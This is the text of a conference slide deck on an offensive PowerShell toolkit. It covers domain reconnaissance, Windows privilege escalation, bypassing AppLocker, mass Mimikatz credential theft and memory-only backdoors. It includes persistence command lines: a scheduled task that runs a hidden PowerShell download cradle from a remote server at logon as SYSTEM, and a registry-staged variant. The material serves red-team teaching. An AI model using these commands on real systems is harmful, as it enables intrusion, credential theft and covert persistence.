Drilling Deeper

with

Veil’s PowerToolsJustin Warner, Will Schroeder

Veris Group’s Adaptive Threat Division

@sixdub

◎Pentester and red teamer for the

Adaptive Threat Division of Veris Group

◎Lots of interest: red team ops, reverse

engineering, adversarial tactics, etc

◎Developer on the Veil-Framework and

co-founder of Veil’s PowerTools

@harmj0y

◎Security researcher and red teamer for

the Adaptive Threat Division of Veris

Group

◎Co-founder of the Veil-Framework and

founder of Veil’s PowerTools

◎Cons: Shmoocon, CarolinaCon, Defcon,

Derbycon, various BSides

tl;dr

◎ Introduction

◎PowerView

◎PowerUp

◎PowerPick

◎PewPewPew

◎PowerBreach

◎Dear M$

◎Demos

◎Questions

Introduction

How We Got Here

The Veil-Framework

◎An offensive toolkit aimed at bridging the

gap between pentesting and red teaming

capabilities

◎Started with the release of Veil-Evasion○ expanded with Catapult, Pillage, and

PowerView

◎CarolinaCon 2014 - “The Veil-

Framework”

Veil’s PowerTools

◎All of our offensive PowerShell work

from the Veil-Framework (and other

projects) was pulled into the new

PowerTools repo

◎PowerTools will remain the primary

source for all PowerShell work, with the

Veil repo containing offensive Python

projects

Sidenote:

Why PowerShell

○ PowerShell provides (out of the box):□ Full .NET access

□ application whitelisting

□ direct access to the Win32 API

□ ability to execute purely in memory

□ default installation Win7+ !

○ “Why I Choose PowerShell as an Attack

Platform”□ http://www.exploit-monday.com/2012/08/Why-I-

Choose-PowerShell.html

“Bad Guys”

“

“Microsoft’s Post-Exploitation

Language”

PowerShell:

-@obscuresec

PowerView

Domain Situational

Awareness

◎Think dsquery on steroids... and cocaine

◎First started because a client banned

“net” commands on domain machines

◎Otherwise initially inspired by Rob

Fuller’s netview.exe tool○ Wanted something more flexible that also didn’t

drop a binary to disk

Background

User Hunting

◎Goal: find which domain machines

specific users are logged into

◎ Invoke-UserHunter: finds where target

users or group members are logged into

on the network

◎ Invoke-StealthUserHunter: extracts

user homeDirectories from AD, gets

sessions on all these file servers to hunt

for targets

○ Significantly less traffic than Invoke-UserHunter

Offensive Event Parsing

◎Once you get DA, domain controller

event logs make it trivial to track down

user locations

◎PowerView’s Get-UserLogonEvents

lets you easily extract account logon

events (4624) from a host

◎ Invoke-UserEventHunter wraps this all

up into a weaponized form

Domain Trusts

◎PowerView can now enumerate and

exploit existing domain trusts:○ Get-NetDomainTrusts, Get-NetForestDomains

◎Most PowerView functions now accept a

“-Domain <name>” flag, allowing them to

operate across trusts○ e.g. Get-NetUsers –Domain sub.test.local

◎ Invoke-MapDomainTrusts can

recursively map all reachable trusts from

a foothold

Data Mining

◎PowerView’s Invoke-ShareFinder -

CheckAccess can find all shares

readable by the current user

◎ Invoke-FileFinder can search a network

for open file shares, or take a share list

from Invoke-ShareFinder

◎Spits out a .csv of found files, sortable by

creation or last access times

PowerUp

Automating Windows

Privesc

Background

◎On past assessments, had to escalate

privileges on a locked down workstation

◎Kernel exploits wouldn’t work, so fell

back to vulnerable service binaries

◎More or less did everything manually,

wanted something a bit easier○ Started implementing the “Encyclopedia of

Privesc”

Windows Services

◎One of the most effective escalation

vectors was (and still is) vulnerable

Windows services○ Sometimes can modify a service itself

○ Get-ServicePerms will check for these

◎However, many organizations overlook

the permissions for service binaries :)○ Use Get-ServiceEXEPerms, then overwrite the

service binary to add a local user or install an

agent

.DLL Hijacking

◎Many programs/services will search in

multiple locations when loading,

including directories listed in the PATH

environment variable

◎ If you have write access to any folder in

PATH, there’s a good chance you can

drop a malicious DLL and escalate

privileges○ Invoke-FindPathHijack will search for these

opportunities

PowerUp

◎Automates everything we’ve talked

about, and more

◎ Invoke-AllChecks will run all current

checks against a host

◎Functions exist to abuse most of the

escalation vectors found

PowerPick

Lock Picking the

AppLocker

Background

◎ Incident responders are recognizing and

targeting PowerShell.exe

○ Had a client write HIPS rules against

psh_psexec, YA, for reals

◎We wanted to be prepared for more

situations like this

◎Developed PowerPick as a combination of

solutions to run PowerShell without

powershell.exe

Bypassing the Blacklist

◎ Used assemblies in .NET/C# to execute code

○ System.Management.Automation

◎ Developed SharpPick

○ http://www.sixdub.net/2014/12/02/inexorable-

powershell-a-red-teamers-tale-of-overcoming-

simple-applocker-policies/

◎ To defeat with blacklist policy (not ideal), must

permission off or block DLLs in the Global

Assembly Cache (GAC)

○ C:\Windows\Assembly\*

OH BTW

Runspaces in Unmanaged Code

◎SharpPick wasn’t very sexy

○ Binary on disk = Lame!

◎Lee Christensen (@tifkin_) authored

“UnmanagedPowerShell” to utilize .NET

assemblies from C

○ Uses CLR and custom .NET assembly in memory

○ https://github.com/leechristensen/UnmanagedPo

werShell

◎Transformed this code into a reflective

DLL = ReflectivePick

PowerShell Inception = Injection!!

◎Decided it needed more PowerShell

◎Embedded ReflectivePick into Invoke-

ReflectivePEInjection from Powersploit

by @josephbialek

○ Created Invoke-PSInjector

◎ Injects DLL into remote process that

runs PowerShell code

ReflectivePick Diagram

*.exeInvoke-PSInjector

ReflectivePick

.NET AssemblyDownload Cradle

Invoke-PowerCeption?

PewPewPewLaunching Lazerz at

your Targets

Invoke-Mass*

◎Model to run PowerShell scripts on a

mass number of machines and retrieve

results:

1. A jobbified webserver is kicked off in the

background which serves out a specified

PowerShell file

2. A IEX() one-liner is executed on machines

through WMI to download/executed the

hosted code

3. Results are POSTed back to the local

webserver

Invoke-MassMimikatz

◎Executes PowerSploit’s Invoke-

Mimikatz on multiple machines without

PSRemoting

◎Raw Mimikatz results are saved on the

pivot host

◎Result files are parsed and

Server:Credential objects are output to

the pipeline

Invoke-MassMimikatz

Invoke-MassSearch

◎Microsoft has another gift for attackers,

the Windows Search Indexing Service○ Why search through all of a system’s file when

Windows does this for you?

◎ Invoke-MassSearch performs the same

pattern as Invoke-MassMimikatz○ allows you to query the search indexer across

machines where you have admin access

PowerBreach

New Release

Background

◎One obvious gap remaining in workflow

of Veil PowerTools

◎Motivation: offense in depth theory

◎Wanted multiple easy ways to remain

resident on the compromised systems○ Memory only

PowerBreach

◎Yes… More PowerShell○ Why not utilize our favorite scripting language?!

◎Goal: automate a bunch of

techniques/tools to backdoor a system

◎Multiple triggers, various host/network

signatures○ We will show some of the “cool” ones

Invoke-EventLogBackdoor

◎Based on Shmoocon 2013 “Wipe The

Drive” by Jake Williams

(@MalwareJake)

◎Uses Get-WinEvent to monitor windows

event logs for failed RDP attempts

◎When it recognizes “trigger” username,

phones home to attacker○ With an IEX(...) download cradle

Invoke-PortKnockBackdoor

◎Based upon Get-Packet by Robbie

Foust http://blog.robbiefoust.com/?p=68○ Uses system.net.sockets.socket to create raw

socket

○ Uses socket.iocontrol to make promiscuous

◎Promiscuously sniffs traffic on system

and inspects data for “magic” trigger

value ○ UDP, TCP, ICMP

Invoke-DeadUserBackdoor

◎Common action of attackers is to add

domain/local users

◎Uses ADSI to monitor for a users

existence

◎ If the user is not found, assumes the

worst and phones home

Invoke-ResolverBackdoor

◎Attempts to be a little stealthier and

usable on external assessments

◎Resolves specified DNS name on

interval and if the resolution doesn’t

equal a predefined IP...

◎… PHONE HOME TO THAT IP!

Persistence… If you must

◎Focuses more on non-persistent

backdoors

◎Schedule tasks seem to work really well

for PowerShell in domain networks

schtasks /create /tn OfficeUpdater /tr

"powershell.exe -w hidden -NonI -nop -c 'IEX

((new-object

net.webclient).downloadstring(''http://server/scri

pt.ps1'''))'" /sc onlogon /ru System

Registry Storage

◎Better yet, stage your script in the registry!

$backdoor = "write-host 123”

Set-ItemProperty -Path 'HKLM:\HARDWARE' -Name

'secret' -Value $backdoor

schtasks /create /tn Updater /tr "powershell -c 'IEX (gp

HKLM:HARDWARE\ secret).secret'" /sc onlogon /ru

System

So what?

◎Nothing revolutionary here!

◎Nothing worse than owning a system

and not being able to get back on later!

◎Real power comes when combining

PowerTools○ PewPewPew with PowerBreach

2 Cents

Almost ready for the show!

Obligatory Defense Slide

◎HIPs and Whitelisting generally help

endpoint defense

◎Enterprise incident response capabilities○ Memory only capabilities but scripts (“malware”)

able to be easily recovered and analyzed

◎Need a clear way to restrict PowerShell

& .NET assemblies to certain users

True Story…

Demos

Questions?

◎Justin○ @sixsub

○ http://www.sixdub.net/

○ justin [at] sixdub.net

◎Will○ @harmj0y

○ http://blog.harmj0y.net/

○ will [at] harmj0y.net

◎https://github.com/veil-framework/PowerTools